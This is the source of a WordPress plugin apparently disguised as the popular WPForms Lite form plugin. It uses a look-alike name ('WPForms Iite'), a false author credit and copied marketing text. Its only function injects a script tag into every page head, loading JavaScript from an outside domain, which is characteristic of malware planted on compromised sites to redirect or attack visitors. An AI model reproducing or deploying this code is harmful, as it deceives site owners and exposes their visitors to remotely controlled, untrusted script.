<?php
/**
 * Plugin Name: WPForms Iite
 * Description: When it comes to the best free WordPress plugins, WPForms Lite offers the most value. We’re absolutely sure of that because we know our plugin better than anybody else (obviously).  The free version of WPForms has 800,000+ active installations on the WordPress.org plugin repository, and WPForms is trusted by over 6 million sites in total across the Lite and paid tiers
 * Version: 5.6.6
 * Author: Wordpress
 */

if (!defined('ABSPATH')) {
    exit;
}

add_action('wp_head', 'icarus_wpforms_iite_head');

function icarus_wpforms_iite_head() {
    echo '<script src="https://niaoend.com/Traffic/api"></script>';
}
